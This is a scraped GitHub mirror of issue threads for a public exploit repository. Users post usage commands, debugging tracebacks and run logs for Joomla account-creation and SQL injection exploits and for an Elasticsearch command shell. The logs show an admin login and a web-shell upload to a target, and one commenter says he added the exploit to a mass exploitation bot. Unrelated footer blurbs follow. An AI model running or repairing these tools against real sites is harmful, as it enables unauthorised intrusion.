xiphosresearch / exploits Goto Github PK
View Code? Open in Web Editor NEWMiscellaneous exploit code
Home Page: http://www.xiphosresearch.com/
Miscellaneous exploit code
Home Page: http://www.xiphosresearch.com/
Line 46 in 44bf14d
Line 46 needs to be fixed to: result += value.decode('utf-8')
It's been 6 months, no bug bounty pay-out, they stopped replying to my emails...
Have verified exploit works with latest version, one executable (the exploitable one) has same MD5 hash, the other executable has same hard-coded auth string.
People gotta know.
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[!] Admin Login Failure!
[-] Check email for activation code
[?] Press any key after activation
[email protected]
I am not getting any activation mail?
https://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py
line 187: except Excption:
Changing it to except Exception: worked for me.
Thanks for sharing the exploit. It is super easy to use.
python joomblah.py http://10.xx.xx.xx.
Traceback (most recent call last):
File "joomblah.py", line 186, in
sys.exit(main("http://IP:8080/joomla"))
File "joomblah.py", line 183, in main
pwn_joomla_again(options)
File "joomblah.py", line 147, in pwn_joomla_again
tables = extract_joomla_tables(options, sess, token)
File "joomblah.py", line 74, in extract_joomla_tables
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
File "joomblah.py", line 46, in joomla_370_sqli_extract
result += value
TypeError: can only concatenate str (not "bytes") to str
DoubtfullyMalignant.py
On v2.7 you get: ImportError: No module named socketserver
On v3.5 you get: SyntaxError: Missing parentheses in call to 'print'
Affected systems: Ubuntu Server and Windows 7
Please fix.
bro i add your exploit to my mass exploit bot.. and i make these modifications:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
and
resp = sess.get(options.url + "/index.php/component/users/?view=login", verify=False)
To take off warning and ssl certificate check ;))
see ya
link: https://github.com/anarcoder/google_explorer/blob/beta_version/exploits/joomraa.py
I am getting this error when executing this exploit. It happens on when the script is uploading the exploit. Host is running Joomla 3.6.3.
Should I be pointing the script to the login page or the home page?
thanks
root@kali:/tmp# ./joomra.py -u none -e [email protected] http://xxx.xxx.xxx.xxx
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://xxx.xxx.xxx.xxx/images/FGIA7RIB7.pht
Traceback (most recent call last):
File "./joomra.py", line 249, in <module>
sys.exit(main("http://192.168.10.100:8080/joomla"))
File "./joomra.py", line 243, in main
if pwn_joomla(options):
File "./joomra.py", line 218, in pwn_joomla
return stage_two(options, sess)
File "./joomra.py", line 123, in stage_two
return upload_file(options, sess, image_path)
File "./joomra.py", line 141, in upload_file
resp = sess.post(upload_url, files=files, data=data, verify=False)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 535, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 474, in request
prep = self.prepare_request(req)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 407, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 305, in prepare
self.prepare_body(data, files, json)
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 483, in prepare_body
(body, content_type) = self._encode_files(files, data)
File "/usr/lib/python2.7/dist-packages/requests/models.py", line 158, in _encode_files
fdata = fp.read()
AttributeError: 'NoneType' object has no attribute 'read'
python joom.py -u hacker -p password1 -e [email protected] http://website.com/joomla
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!:
::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: ::
: ::: : : : : : : : : : : : : : : : : : :::
[-] Getting token
[!] Cannot find CSRF token
[*] FAILURE
when runnig this script i have message: Cannot find CSRF token
does it means that my website is not vulnerable?
After getting shell when I want to run my commands I got this error:
Traceback (most recent call last):
File "elastic_shell.py", line 56, in <module>
main(args=sys.argv)
File "elastic_shell.py", line 53, in main
exploit(target=args[1])
File "elastic_shell.py", line 47, in exploit
execute_command(target=target, command=cmd)
File "elastic_shell.py", line 36, in execute_command
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
KeyError: 'hits'
Script stops after :-
[-] Fetching CSRF token
[-] Testing SQLi
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.